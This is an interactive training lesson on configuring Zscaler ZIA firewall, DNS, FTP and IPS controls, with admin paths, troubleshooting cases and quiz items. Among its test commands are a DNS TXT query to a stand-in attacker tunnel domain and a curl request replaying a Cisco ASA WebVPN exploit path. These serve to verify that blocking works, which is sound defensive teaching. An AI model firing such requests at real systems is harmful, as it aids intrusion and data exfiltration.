TTechclick ⚡ XP 0% All lessons
Zscaler · ZIA · Firewall · Firewall ControlsInteractive · L1 / L2 / L3

Zscaler ZIA Firewall Deep-Dive — Cloud Firewall, DNS, FTP & IPS Control

Think of ZIA's firewall section as a four-counter airport terminal: the directory desk maps a name to a gate, the gate guard checks your ticket, the cargo desk handles file transfers, and the X-ray scanner deep-inspects whatever already boarded. This lesson walks all four controls — Cloud Firewall, DNS Control, FTP Control and IPS Control — in the exact order ZIA evaluates them, with the admin paths, defaults and gotchas an L1/L2 engineer gets asked about on day one.

📅 June 4, 2026 · ⏱ 11 min · 3 live demos · 4 infographics · 🏷 10-Q assessment + AI Tutor inline

⚡ Quick Answer

Hands-on Zscaler ZIA firewall lesson: Cloud Firewall, DNS, FTP and IPS Control — real admin paths, defaults, evaluation order and exam-critical gotchas.

🎯 By the end you will be able to

Read as:

Pick where you want to start

1

Gate Guard

How Firewall Filtering reads rules top-down — and why ‘Any’ means ignored.

 2

Directory Desk

How DNS Control resolves, blocks tunnels, and stops the 8.8.8.8 bypass.

 3

Cargo Desk

Why native FTP dies silently and how passive-only keeps it safe.

 4

X-Ray Scanner

How IPS Control catches an exploit on traffic the firewall already allowed.

🧠 Warm-up — 3 questions, no score

Just notice which ones make you pause. We answer all three inside the lesson.

1. A new branch’s firewall rules never get hit even though traffic flows. The most likely cause is:

Answered in Gate Guard.

2. Roaming laptop users can’t use native FTP but the office can. The usual reason is:

Answered in Cargo Desk.

3. Which protocol can silently bypass DNS Control unless you force it through Zscaler?

Answered in Directory Desk.

Most engineers think…

“Zscaler's Cloud Firewall only protects web traffic on ports 80 and 443 — for everything else I still need my old on-prem firewall.”

Wrong on both counts. ZIA Cloud Firewall is a stateful next-gen FWaaS that inspects all 65,535 ports and every protocol, not just web. And the four controls are separate engines that fire in a fixed order — DNS Control resolves the name first, Firewall Filtering matches the 5-tuple, then FTP Control and IPS Control deep-inspect what was already allowed. Treating it as “just a web filter” is exactly how an unconfigured FTP Control tab becomes an unmonitored exfil lane and DNS tunnels walk out on port 53.

Four words to know before the four controls

Read these first. Each card flips to the one thing that actually matters in production.

🧱
FWaaS (Cloud Firewall)
tap to flip

A cloud-delivered stateful firewall inspecting every port and protocol per user and location. So what: no appliance to patch, and policy follows the user.

🔢
First match wins
tap to flip

Rules run top-down in ascending order; the first match decides and stops evaluation. So what: rule ORDER changes the outcome, not just the rules themselves.

🧭
ZTR (Zscaler Trusted Resolver)
tap to flip

A trusted DNS resolver reached via Ghost IPs over tunnels. So what: it stops rogue 8.8.8.8 or 1.1.1.1 lookups, but it won't terminate DoH on its own.

🛡
IPS for non-Web
tap to flip

Signature IPS on firewall-allowed non-web traffic. So what: it catches exploits the web proxy never sees, but only inside traffic you already allow.

Figure 1 — Where the four controls live
All four firewall controls live inside one cloud firewall section at the ZIA Service Edge — there is no on-prem box.Two ingress sources on the left — a branch or HQ connected by a GRE or IPSec tunnel, and a roaming laptop connected by Z-Tunnel via Client Connector — send traffic into a large cloud labelled ZIA Public Service Edge. Inside the cloud, a single Policy to Firewall Control panel stacks four engine boxes: DNS Control, Firewall Filtering, FTP Control and IPS Control, plus a smaller NAT Control sibling. An arrow exits the cloud on the right to Internet and SaaS. A leader line calls out that all four controls are one cloud policy with no on-premises appliance. Branch / HQ GRE / IPSec tunnel Roaming laptop Z-Tunnel / Client Connector ZIA Public Service Edge (cloud — no on-prem box) Policy → Firewall Control DNS Control Firewall Filtering FTP Control IPS Control NAT Control allowed Internet / SaaS ← all 4 controls, one cloud policy Legend trusted inspection allowed key node
Look here: DNS, Firewall Filtering, FTP and IPS Control are four boxes inside one amber cloud policy panel — no separate on-prem firewall exists.

1 · Cloud Firewall (Firewall Filtering) — The Gate Guard

Picture the gate guard at a busy airport who reads your boarding slip line by line and decides, on the very first matching rule, whether you board or get turned away — that is exactly how Zscaler's Cloud Firewall reads each session.

The Cloud Firewall lives at Policy → Firewall Control → Firewall Filtering, sitting beside its siblings DNS Control, FTP Control, IPS Control and NAT Control. Unlike a plain web proxy that only watches ports 80 and 443, this guard checks all 65,535 ports and every protocol that leaves your branch.

You build the guard's rulebook by clicking Add Firewall Filtering Rule. Each rule can match on Users (up to 4), Groups (up to 8), Departments, Locations (up to 8), Location Groups (up to 32) and Time (up to 2 windows). On the destination side you set Destination Addresses (real IPs and FQDNs), Destination IP Groups, Destination Countries, plus Network Services and Network Applications.

Leave a field blank and the guard reads it as "Any" — it stops checking that column entirely. So a rule with only a Network Service of DNS and an Action of Block will block DNS for everyone, everywhere, because the User and Location fields are silently ignored.

The Action decides the verdict: ALLOW lets the session board, BLOCK_DROP drops it silently, BLOCK_RESET drops it and sends a TCP RST so the app fails fast, and BLOCK_ICMP returns an ICMP unreachable. Full per-session logging kicks in only on Block rules.

L2 · Order matters more than wording. The guard reads top-down and stops at the first match, so your admin rules belong at Rule Order 1. The undeletable "Default Firewall Filtering Rule" sits at the lowest precedence and blocks everything that fell through — and you should leave the first ~4 predefined rules (Recommended Firewall Rule, Zscaler Proxy Traffic, Office 365/UCaaS One Click) untouched.

L3 · Basic versus Advanced Cloud Firewall (ZS-CTP-1 / ZIA-FIREWALL) is a real evaluation-time fork, not a price tier. Advanced unlocks FQDN and wildcard rules, custom IPS signatures, DNS-tunnel detection and a ceiling above 1,000 rules — so an FQDN-based rule that silently never matches on a Basic tenant is a licensing symptom, not a config bug.

One trap catches almost every new admin: the firewall must be switched on per Location or Sub-location at Administration → Location Management → Enable Firewall. If that box is unchecked, your beautifully ordered rules never evaluate — the guard is standing there with the rulebook closed.

🖥️ The screen you'll use — Policy → Firewall Control → Firewall Filtering → Add Firewall Filtering Rule. Recreated for clarity — your console matches this.
admin.zscaler.net · Firewall Control
3Rule Order
1
Rule Name
Block-Branch-DNS-Exfil
Status
Enabled
Users
Any
Source IP Groups
Pune-Branch-10.50.12.0/24
Destination Addresses (FQDN)
*.dnstunnel.example.net
2Network Services
DNS
Time
Any
1Action
Block Drop ▾  (Allow / Block Drop / Block Reset / Block ICMP)
Save

Pins mark the three fields that change the outcome: ① Action = Block Drop (silent), ② Network Services = DNS (the protocol scoped), ③ Rule Order = 1 (so it wins before any lower allow rule).

test — probe a port behind a Block Reset rule from a client at the location
curl -v http://10.50.12.20
Expected output
*   Trying 10.50.12.20:80...
* connect to 10.50.12.20 port 80 failed: Connection reset by peer
* Failed to connect to 10.50.12.20 port 80 after 12 ms: Connection reset by peer
curl: (7) Failed to connect to 10.50.12.20 port 80 after 12 ms: Connection reset by peer

A Block Reset gives you that instant "Connection reset by peer"; a Block Drop would just hang until curl times out. Cross-check the verdict at Analytics → Firewall Insights → Logs — the matching session should show action = Block.

Sneha at Infosys faces this

She built a clean set of firewall rules for the new Pune branch, but Firewall Insights shows zero hits on every rule — even though users there browse the web normally.

Likely cause

The firewall engine is never invoked for the Pune sub-location because Enable Firewall was left unchecked when the location was created. Web browsing still works because that rides the proxy path, not the firewall path.

Diagnosis

Open the Pune location's settings and look for the Enable Firewall toggle in its control options.

Administration → Location Management → Pune → Enable Firewall
Fix

Tick Enable Firewall on the Pune sub-location and save. Activate the change so it pushes to the cloud.

Verify

Generate traffic from a Pune client, then watch the rule's hit-counter climb in Analytics → Firewall Insights → Logs. Non-zero hits confirm the engine is now evaluating.

Pause & Predict

A BLOCK rule sits at Rule Order 2 and an ALLOW rule at Rule Order 5, and both match the same session — which one wins? Type your guess.

Answer: Rule Order 2 wins. The guard reads top-down and acts on the first match, so the Block fires and processing stops — the Order 5 Allow is never even reached.
Quick check · Apply

Sneha's new branch firewall rules log zero hits although users browse normally. The most likely fix is:

Correct: C. Zero hits across all rules while browsing still works means the firewall engine is never invoked — that only happens when Enable Firewall is unchecked for the location. Reordering (a) is tempting but rules that never evaluate cannot be fixed by ordering them; order only matters once the engine actually runs.

▶ How the firewall reads your rules, one row at a time

A laptop in Noida opens Google. Watch the rule table get scanned top-down until one row matches. Press Play for the healthy path, then Break it to see the failure.

① Packet arrivesSneha's laptop sends a packet. The firewall reads its 5-tuple: source 10.20.5.40, destination 142.250.183.14, service HTTPS (TCP 443).
② Check Rule 1The firewall tests Rule 1 first. It only allows the Finance subnet, not Sneha's range. No match, so it drops to the next row. You see this in Administration > Firewall Control.
③ Check Rule 2Rule 2 says: Source IP Group "All-Staff" plus Network Service "HTTPS". Sneha's IP sits in that group and the service fits. This row matches.
④ Action: ALLOWThe firewall runs Rule 2's action, ALLOW, and stops scanning. Lower rules never run. Google loads for Sneha.
Press Play to step through the healthy path. Then press Break it.
Here is the figure.
Figure 2 — The packet's path: DNS → NAT → Firewall → FTP → IPS
The evaluation order is fixed: DNS resolves first, IPS inspects last, and IPS only sees traffic the firewall already allowed.A single session enters on the left and crosses five counters in fixed order, each shown as an airport desk: 1 DNS Control (directory desk), 2 NAT Control (redirect sign), 3 Firewall Filtering (gate guard that Allows or Blocks), 4 FTP Control (cargo desk), 5 IPS Control (X-ray). A callout from the firewall warns that Network Services must allow DNS or step 1 never sees traffic. A gate between the firewall's Allow exit and IPS notes that IPS only inspects traffic the firewall already allowed; blocked sessions stop at the firewall. Trusted (DNS / Firewall) Inspection (FTP / IPS) Allowed exit Blocked Key gate Session packet in ① DNS Control directory desk resolves names ② NAT Control redirect desk rewrites address ③ Firewall gate guard Allow or Block Allow Block → dropped session stops here ④ FTP cargo desk file transfer ⑤ IPS X-ray scan inspects last Firewall must allow Network Services = DNS, or step ① never sees traffic. IPS only inspects ALLOWED traffic — blocked sessions never reach the X-ray. This gate is the "aha": order is fixed.
What to look for: the green Allow path is the only way into the FTP and IPS desks — the lime gate proves IPS sees only what the firewall already passed.

2 · DNS Control — The Directory Desk

Before a traveller ever reaches a security gate, they stop at the enquiry desk and ask "which gate is Frankfurt?" — DNS Control is that desk for every connection, mapping a name to a number before the journey starts.

Every device on your network asks "what's the IP for portal.bank.com?" thousands of times a day. ZIA sits in the middle of that conversation as a DNS proxy at the Public Service Edge. It inspects every query no matter how it travels — plain UDP, TCP, or encrypted DoH.

You build this at Policy → Firewall Control → DNS Control. Three building blocks live there: DNS Control Rules (the decisions), DNS Gateways (where you forward queries), and EDNS Client Subnet (ECS) Prefixes (how much of the user's subnet — a /20 to /24 slice — gets shared so answers stay geographically close). Rules read top-down and first match wins, so order matters as much as content.

A rule matches on real criteria: Users/Groups/Departments, Locations, Requested Domain or Resolved IP categories, DNS record types (A, AAAA, TXT…), source and destination countries, protocols (UDP/TCP/DoH), and DNS Tunnels & Network Applications. When it fires, you pick an action: Allow, Block, Redirect Request & Keep Sender Protocol, Redirect Request Using TCP/UDP, or Redirect Response — the last one rewrites the answer itself, so www.bing.com quietly becomes strict.bing.com to force SafeSearch.

Two predefined tunnel rules do heavy lifting. Known DNS Tunnels blocks recognised malicious tunnelling services — malware that smuggles data out inside TXT lookups. Unknown DNS Traffic catches malformed packets, DNS on non-standard ports, or non-DNS traffic pretending to be DNS. Real DNS rides port 53 (UDP/TCP); DoH rides port 443.

L3 · By default Zscaler redirects DNS to the ZTR using a NAT Control rule. Ghost IPs resolve port-53 traffic to the ZTR — but only over an established tunnel (GRE, IPSec, or Z-Tunnel 2.0). One sharp limit to remember in design: the ZTR does not terminate DoH tunnels. A user who phones a private DoH number on 443 skips the desk entirely unless you block that endpoint and SSL-inspect the 443 traffic.

🖥️ The screen you'll use — Policy → Firewall Control → DNS Control → Add DNS Control Rule. Recreated for clarity — your console matches this.
admin.zscaler.net · DNS Control
Rule Order
3
Rule Name
Block-DNS-Tunnels
Requested Domain Categories
Any
DNS Record Types
A, AAAA, TXT
Protocols (UDP/TCP/DoH)
UDP, TCP
3 DNS Tunnels & Network Applications
Known DNS Tunnels
1 Action
Redirect Request & Keep Sender Protocol
2 DNS Gateway
Zscaler DNS Gateway
Save

Pins mark the three fields that decide behaviour: ① Action (what happens on match), ② DNS Gateway (where the query is forwarded), ③ DNS Tunnels (the malicious-tunnel trigger that fires this rule).

probe — fire a TXT tunnel query through the tunnel resolver
dig TXT exfil.attacker-tunnel.example @172.16.0.2
Expected output
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 41207
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;exfil.attacker-tunnel.example.  IN  TXT
;; no answer — flagged "Known DNS Tunnel" in DNS Insights logs
verify — a clean name still resolves via the Trusted Resolver
nslookup google.com
Expected output
Server:   ztr.zscaler.net
Address:  185.46.212.88

Non-authoritative answer:
Name:     google.com
Address:  142.250.183.110

Rahul at TCS faces this

After he adds a blanket "redirect all DNS to ZTR" rule, internal logins break across the LAN — file shares, the domain controller, and every .local app stop resolving, while public sites still load.

Likely cause

The redirect rule has no scope limit, so private internal zones like corp.local are being forwarded to the public Zscaler resolver — which has never heard of them and returns nothing.

Diagnosis

He opens the redirect rule and reads its match scope — it says "Any" requested domain, so it swallows internal queries that should stay on the local DC.

Policy → Firewall Control → DNS Control → (redirect rule) → scope
Fix

He excludes internal AD zones from the redirect — adds .local, .test, and corp.local to a higher-priority Allow rule so they keep resolving on the on-prem domain controller.

Verify

nslookup dc01.corp.local resolves to the internal DC again, while nslookup google.com still answers from the ZTR — both paths now correct.

Pause & Predict

A user sets the browser to Cloudflare DoH on 443. Will your plain port-53 DNS Control rules catch those queries? Type your guess.

Answer: No — DoH rides 443, so it's invisible to port-53 rules. The query never touches the desk. To stop it you must block the native DoH endpoints and turn on SSL inspection for that 443 traffic.
Quick check · Analyze

A user switches the browser to Cloudflare DNS-over-HTTPS (1.1.1.1) on 443. Your existing port-53 DNS Control rules will:

Correct: a. DoH wraps DNS inside HTTPS on port 443, so a rule scoped to port-53 traffic never sees it. Option c is the tempting trap — the ZTR only handles port-53 queries over your tunnel and does not terminate DoH, so it can't redirect 443 traffic it never receives.

▶ Stopping data from sneaking out through DNS

Malware on Rahul's machine tries to smuggle stolen files inside DNS tunneling. Watch DNS Control catch it at the edge. Press Play for the healthy path, then Break it to see the failure.

① Malware crafts a queryThe malware encodes stolen invoice data into a TXT lookup for a long random hostname under an attacker domain. It looks like an ordinary name request.
② Hits the Service EdgeThe query reaches the ZIA DNS proxy at the nearest Service Edge. Every DNS request from Rahul routes through here first.
③ Rule matchesThe predefined "Known DNS Tunnels" rule inspects the request. Its pattern matches this tunnel's signature. You manage this in Policy > DNS Control.
④ Action: BlockZIA drops the query before it leaves the building and writes a log entry. The stolen data never reaches the attacker.
Press Play to step through the healthy path. Then press Break it.

3 · FTP Control — The Cargo Desk

Picture the airport: passengers walk through the passenger gate, but parcels and cargo go to a separate desk with its own rules. FTP Control is that cargo desk — and by default it keeps the shutter half-down, accepting only certain pickups while quietly turning others away.

You manage this desk under Policy → Firewall Control → FTP Control. The service handles two kinds of file transfer. FTP over HTTP is what a browser or proxy uses. Native FTP is what a desktop client like FileZilla speaks directly.

Here is the gotcha that catches most teams. Out of the box the service blocks FTP over HTTP and allows only native FTP — and native FTP works only from known Locations, not from Client Connector users. Since Client Connector and PAC can carry only FTP over HTTP, their file transfers fail silently until you turn that toggle on.

You control the desk with four levers: Enable FTP over HTTP (ftp_over_http_enabled), Enable Native FTP (ftp_enabled), URL Categories allowed for FTP, and a specific URLs list. Native FTP is also switched on per-location, so a branch can transfer while a roaming laptop cannot.

Now the wiring. The control channel rides port 21, active-mode data uses port 20, and passive data uses the high range 1024–65535. Zscaler accepts passive mode only (including FTPS over TLS). Native clients point at the Zscaler FTP proxy, for example gateway.zscaler.net on port 21, logging in as USER <login>@<destination-host>. Think of passive as the customer walking up to the front of the desk to collect — pickup at the counter, every time.

Why active mode dies: in active FTP the server opens a fresh connection back to the client on port 20. Through the cloud proxy and its NAT, that inbound connection has nowhere to land — like a courier trying to slip in the back door of a sealed terminal. So you must set passive mode on the client; active transfers will stall and then get blocked.

L3 · Precedence is the architect's trap here. URL Filtering policy is evaluated before FTP Control, so a category you blocked in URL Filtering — say Adult Material — stays blocked over FTP no matter what you allow at the cargo desk. Treat FTP Control as a narrowing gate on top of URL Filtering, never as an override. When you scope FTP Control, also confirm the destination's category is permitted in Policy → URL & Cloud App Control → URL Filtering first.

🖥️ The screen you'll use — Policy → Firewall Control → FTP Control. Recreated for clarity — your console matches this.
admin.zscaler.net · FTP Control
1 Enable FTP over HTTP
ON
2 Enable Native FTP
ON
3 URL Categories (allowed for FTP)
Approved-FTP-Sites
URLs
ftp.example.com
FTP mode
Passive only (FTPS supported)
Note
Native FTP also enabled per Location
Save

Pins mark the three settings that fix roaming users: ① turns on FTP over HTTP, ② keeps native FTP available for offices, ③ scopes both to an approved URL category.

test — passive FTP through the Zscaler proxy from a known location
lftp -e 'set ftp:passive-mode on; ls; quit' -u 'testuser@ftp.example.com,***' gateway.zscaler.net
Expected output
Connecting to gateway.zscaler.net (165.225.x.x) port 21
230 Login successful (proxied to ftp.example.com)
drwxr-xr-x   2 ftp ftp   4096 Jun 04 09:12 pub
-rw-r--r--   1 ftp ftp  20480 Jun 04 09:12 readme.txt
# now retry with 'set ftp:passive-mode off' (active):
425 Connection blocked by Zscaler — active-mode data channel not permitted

Aditya at HCL faces this

Remote employees on Client Connector say FileZilla "just hangs" when they try native FTP, but staff sitting in the office transfer files without any trouble.

Likely cause

Client Connector can carry only FTP over HTTP, which is blocked by default. Native FTP is allowed only from known office Locations, so roaming laptops have no working path and the session stalls.

Diagnosis

Open the FTP Control policy and confirm that Enable FTP over HTTP is still OFF while only native FTP is on — that gap explains why office (location-based) works but roaming does not.

Policy → Firewall Control → FTP Control → Enable FTP over HTTP
Fix

Turn on Enable FTP over HTTP and scope it to your approved URL Categories (for example Approved-FTP-Sites), so Client Connector users get a permitted path without opening every site.

Verify

Have a Client Connector user fetch a test file from an approved FTP site over HTTP; the transfer completes and the session shows up as allowed in the firewall logs.

Pause & Predict

URL Filtering blocks the "Adult Material" category. You then explicitly ALLOW that same destination in FTP Control. Does the FTP transfer go through? Type your guess.

Answer: No — URL Filtering is evaluated before FTP Control, so it takes precedence. The category stays blocked over FTP even though you allowed it at the cargo desk.
Quick check · Apply

Roaming Client Connector users' native FileZilla FTP hangs while office users transfer fine. The fix is to:

Correct: d. Client Connector carries only FTP over HTTP, which is off by default — enabling and scoping it gives roaming users a working path. Option (a) fails because Zscaler accepts passive mode only; active connect-back can never traverse the cloud proxy's NAT.

4 · IPS Control — The X-Ray Scanner

Remember the lobby guard from earlier sections? He decided who walks through the door. The X-ray machine sits just past him — it scans the bags of people the guard already waved in, and pulls anyone whose bag matches a known-weapon shape.

IPS Control is that X-ray for your network traffic. You reach it at Policy → Firewall Control → IPS Control. It runs a signature-based engine over every non-web protocol — HTTP, HTTPS, FTP, DNS, raw TCP, UDP, IP. Think of it as "IPS for non-Web".

The key word is already allowed. IPS only inspects packets the firewall let through. If your Firewall Filtering rule dropped a session, it never reaches the X-ray — exactly like a passenger turned away at the gate never walks past the scanner. On a signature match, IPS drops or resets the connection and writes the event to your Firewall Log.

Do not confuse this with ATP. ATP is "IPS for Web" — it lives at the proxy layer (Policy → Threat Protection → Advanced Threat Protection) and sends web threats to the Web Log. IPS Control works at the firewall/packet layer for non-web threats. When both apply, ATP runs first, then IPS Control.

The pipeline order is strict: Firewall Filtering allows the session, then IPS Control inspects it against signatures, then it blocks on a match. So a packet that Firewall Filtering blocks is invisible to IPS — there is no second chance to catch an exploit on a session you already dropped. You build defence in layers, not in parallel.

L3 · IPS Control needs the Cloud Firewall Advanced subscription. Without it, the menu is greyed out and custom rules are unavailable — you get the default Allow behaviour and nothing to tune. Zscaler ships 2,000+ new signatures a year, pushed transparently several times a day, so the engine stays current without any change on your side. Your only job is writing the rules that decide what to do on a match.

Here is the trap that bites people. The default IPS Control rule is Allow, and it sits at the bottom of the list. Until you add an explicit rule, a matched threat is detected but waved through. The engine sees the signature — it just does not stop it.

When you click Add IPS Control Rule, you set a few fields. Leave Advanced Threat Categories blank and it means Any. The Destination IP Groups field defaults to All IPv6 Group, and custom destination IPv6 groups are not supported. The Action is where the work happens: choose Block, then pick IPS Drop (silent — the packet just vanishes) or IPS Reset (sends a TCP reset, so the client sees the connection die cleanly).

🖥️ The screen you'll use — Policy → Firewall Control → IPS Control → Add IPS Control Rule. Recreated for clarity — your console matches this.
admin.zscaler.net · IPS Control
3 Rule Order / Rank
1
Rule Name
Block-ASA-WebVPN-Exploits
Status
Enabled
2 Advanced Threat Categories
Remote Code Execution
Network Services
Any
Source IP Groups
Any
Destination IP Groups
All IPv6 Group
Locations
Any
1 Action
Block → IPS Reset
Save

Pins mark the three fields that decide whether this rule actually stops an attack: ① Action set to Block → IPS Reset (not Allow), ② a named Advanced Threat Category instead of blank/Any, and ③ Rule Order 1 so it evaluates above the permissive default.

Replay — send a CVE-matching request to a firewall-allowed HTTPS host
curl -sk -X POST 'https://vpn-lab.internal.corp/+CSCOE+/logon.html' \
  --data 'next_url=/%2bCSCOE%2b/../session_password.html' \
  --resolve vpn-lab.internal.corp:443:172.16.40.12 \
  -o /dev/null -w 'HTTP %{http_code} in %{time_total}s\n'
Expected output
curl: (56) Recv failure: Connection reset by peer
# With the IPS Reset rule active, the TCP session is torn down mid-request.
# Firewall Log → new entry:
#   Action: Blocked (IPS Reset)  Threat: CVE-2025-20333 ASA WebVPN RCE
#   Dest: 172.16.40.12:443  Category: Remote Code Execution
# (With only the default Allow rule, this returns: HTTP 200 in 0.42s)

Priya at Wipro faces this

A Cisco ASA WebVPN exploit (CVE-2025-20333, disclosed 25 Sep 2025) hits an allowed HTTPS path on her VPN appliance. The Firewall Log shows the session was allowed — but nothing is flagged as a threat, even though the payload is a known exploit.

Likely cause

IPS Control is sitting at its permissive default: only the Allow rule exists, with no explicit Block. The signature engine sees the request but has no rule telling it to stop the matched threat, so it waves the session through.

Diagnosis

Open the IPS Control policy and confirm the rule list. If the only entry is the bottom default Allow rule, nothing is being blocked — detection without action.

Policy → Firewall Control → IPS Control
Fix

Add an explicit IPS Control rule at Rule Order 1 with Action = Block → IPS Reset, scoped to the relevant Advanced Threat Categories (Remote Code Execution), so the matched exploit is reset instead of allowed.

Verify

Replay the malformed WebVPN request. It now appears in the Firewall Log as an IPS-blocked, non-web threat entry, and the client connection is reset instead of completing.

Pause & Predict

A Firewall Filtering Block rule drops traffic to a host at Rule Order 2. Will IPS Control still scan THAT traffic for exploits? Type your guess.

Answer: No — IPS only inspects firewall-ALLOWED traffic. A session blocked by Firewall Filtering is dropped before it ever reaches the X-ray, so there is nothing left for IPS to scan.
Quick check · Analyze

A Firewall Filtering rule blocks all traffic to a malicious host at Rule Order 2. Will IPS Control inspect that host's traffic for exploit signatures?

Correct: c. IPS Control sits after Firewall Filtering in the pipeline, so it only ever sees sessions the firewall already allowed. Option (a) is the tempting trap — it reverses the real order; the firewall decides first, and a dropped session is gone before IPS can scan it.

▶ Catching an exploit hidden inside allowed traffic

The firewall already said yes to this HTTPS session. Now IPS Control looks deeper and spots an attack. Press Play for the healthy path, then Break it to see the failure.

① Firewall allows the sessionFirewall Filtering checks Priya's HTTPS connection to 172.16.40.8 and allows it. The session is open and traffic starts flowing.
② IPS inspects the packetsEven though the firewall said allow, IPS Control reads inside the allowed packets. It checks the payload against its signature set.
③ Signature matchesOne packet matches the Cisco ASA WebVPN CVE-2025-20333 exploit signature. IPS now treats this flow as an active attack.
④ Action: IPS ResetIPS sends a TCP RST to kill the session and writes a Firewall Log entry. The exploit never completes.
Press Play to step through the healthy path. Then press Break it.
Figure 3 — The four controls compared
Each control inspects a different layer, needs Advanced for the good stuff, and their defaults differ — the firewall denies by default, IPS allows by default.A four-row comparison matrix of Firewall Filtering, DNS Control, FTP Control and IPS Control across five columns: Control, What it inspects, Subscription, Default action and Rule actions. The Firewall default cell reads BLOCK all and is filled red; the IPS default cell reads ALLOW and is filled amber-red, flagged as the opposite default and an exam trap. Control What it inspects Subscription DEFAULT action Rule actions Firewall Filtering 5-tuple + network app Basic + Advanced Default = BLOCK all Allow · Block Drop Block Reset Block ICMP DNS Control every DNS incl. DoH Advanced per predefined rules Allow · Block · Redirect FTP Control FTP-over-HTTP + native FTP Advanced FTP-over-HTTP blocked native allowed Enable toggles IPS Control intrusion prevention non-web signatures on ALLOWED traffic Advanced ALLOW (permissive!) Allow · Block → IPS Drop / Reset ← defaults are OPPOSITE — this is an exam trap block / deny policy / permissive allowed control Four controls, four layers, one trap
Look at the DEFAULT column: the firewall denies everything (red) while IPS permits everything (amber) — opposite defaults, the classic exam trap.
Figure 4 — Firewall section cheat-sheet
One screen an L1 engineer can memorise before a Zscaler interview.A compact revision card with five labelled tiles: the firewall processing ORDER (DNS to NAT to Firewall to FTP to IPS), the admin navigation PATH under Policy and Firewall Control, the key PORTS, the LICENSE that unlocks Advanced Cloud Firewall, and the TOP 3 GOTCHAS highlighted in lime — enable the firewall on the Location, DoH on 443 bypasses port-53 DNS Control, and the IPS default rule is ALLOW so an explicit Block is required. Zscaler Advanced Cloud Firewall — L1 Interview Cheat-Sheet Memorise these 5 tiles. ZIA processes traffic top-down in a fixed order; the console mirrors it. TILE 1 · PROCESSING ORDER DNS NAT Firewall FTP IPS Resolve first, translate, then allow/deny, then app-control, inspect last. TILE 2 · ADMIN PATH (where to click) Policy ▸ Firewall Control FirewallFiltering DNSControl FTPControl IPSControl TILE 3 · PORTS TO QUOTE DNS 53 (UDP / TCP) DoH 443 (HTTPS — see Gotcha 2) FTP control 21 · FTP active-data 20 FTP passive-data 1024 – 65535 Active = server opens 20 back to client; Passive = client picks high port. TILE 4 · LICENSE Advanced Cloud Firewall SKU: ZS-CTP-1 / ZIA-FIREWALL Unlocks beyond the base firewall: • FQDN-based rules • Custom IPS signatures • DNS-tunnel detection · FTP Control TILE 5 · TOP 3 GOTCHAS (interview gold) 1 Enable Firewall on the Location …or no rule ever hits the traffic. 2 DoH on 443 bypasses DNS Control Port-53 policy won't see encrypted DNS. 3 IPS default rule = ALLOW Add an explicit Block — it fails open. Say these three unprompted = you sound like you've run it. Policy ▸ Firewall Control is the home for all four sub-tabs. memorise →
What to look for: the 5 tiles in order — but the lime card (3 gotchas) is what flips an interview from "read the docs" to "ran it in prod."

🤖 Ask the AI Tutor

Tap any question — instant, scoped to this lesson. No login, no waiting.

Pre-curated from Zscaler docs + community Q&A, scoped to this lesson. For a live prod issue, paste your export into chat.techclick.in.

📝 Wrap-up assessment — six more

You've answered 4 inline. Six left. 70% (7 of 10) marks the lesson complete on your profile. Tap Submit all answers at the end.

Q5 · Remember

In the ZIA admin console, where do all four firewall controls — Firewall Filtering, DNS Control, FTP Control, and IPS Control — live?

Correct: b. All four controls sit together as tabs under Policy → Firewall Control, so you tune DNS, FTP, IPS, and the main filtering ruleset in one place. Option a tempts you because URL and Cloud App Control is also under Policy and also "filters" traffic — but that section governs web categories and SaaS apps, not Layer-3/4 firewall rules. Option c feels right if you assume firewall is "infrastructure" plumbing, yet Administration → Settings holds account and admin config, never traffic policy. Option d is the closest trap: IPS Control really is threat defence, so you reasonably group all four there — but Firewall Filtering, DNS, and FTP are firewall functions, and Zscaler keeps them under Firewall Control, not Threat Protection.
Q6 · Apply

You built a DNS Control rule for your Pune branch (subnet 172.16.20.0/24), but DNS queries still aren't being inspected. Which Firewall Filtering Network Service must also be allowed for DNS Control to see the traffic?

Correct: a. DNS Control only acts on DNS traffic that Firewall Filtering has already allowed, so the DNS Network Service must be permitted for your packets to reach the DNS engine. Option b tempts you because DNS-over-HTTPS is a real trend — but classic resolver traffic here is still UDP/TCP 53, and allowing 443 does nothing for it. Option c confuses reachability testing with name resolution; ICMP only validates that a host answers ping, it carries no DNS query. Option d is pure distractor logic — FTP moves files, resolvers do zone transfers over DNS itself (TCP 53), never FTP, so allowing FTP leaves your DNS rule starved of traffic.
Q7 · Analyze

For one user session from host 10.50.4.18, a Block rule sits at Rule Order 2 and an Allow rule sits at Rule Order 5 — and both match the session. Which rule actually applies?

Correct: b. ZIA evaluates the firewall ruleset top-down and stops at the first match, so the Block at Order 2 fires and Order 5 is never reached. Option a inverts the model — "Allow is safer" sounds prudent, but a firewall that overrode your block with a lower allow would be unusable, and Allow is certainly not the safe default for a denied flow. Option c imagines both rules co-executing; first-match means evaluation halts at Order 2, so Order 5 never logs anything. Option d misreads "match" as "conflict" — there is no conflict to resolve because processing stopped at the first hit; the default rule only applies when nothing above it matches.
Q8 · Analyze

Your URL Filtering policy blocks the "Adult Material" category. You then add an explicit Allow for that same site inside FTP Control so a vendor in Noida can pull files. Does the FTP transfer succeed?

Correct: d. URL Filtering is evaluated ahead of FTP Control, so once the site is blocked by category, the FTP Allow never gets a chance to run. Option a tempts you with the familiar "specific beats general" rule from routing — but here precedence is fixed by engine order, not by how narrow your rule is. Option b assumes policies are isolated silos; they actually chain in a defined sequence, and an earlier block ends the journey for later engines. Option c invents a passive-mode loophole — active versus passive only changes which side opens the data connection, it never skips the URL category decision that already denied the site.
Q9 · Evaluate

Your team plans to rely on IPS Control's default rule to stop a brand-new CVE exploit riding over HTTPS that you have already allowed for your Bengaluru office. Is that a sound plan?

Correct: b. The IPS Control default rule action is Allow, so it inspects but does not stop the exploit until you add an explicit Block rule targeting that signature or threat class. Option a assumes "default" means "deny everything bad" — but a default-allow rule passes traffic through, and trusting it to block is exactly the gap an attacker exploits. Option c overstates automation; Zscaler does ship signatures, yet whether matched traffic is blocked still depends on your rule action, not the signature alone. Option d throws IPS Control out entirely — ATP is a useful extra layer, but IPS Control is precisely where you place the signature Block rule, so dismissing it is wrong.
Q10 · Evaluate

When you design a ZIA firewall policy, what is the correct order in which the firewall sections evaluate a session?

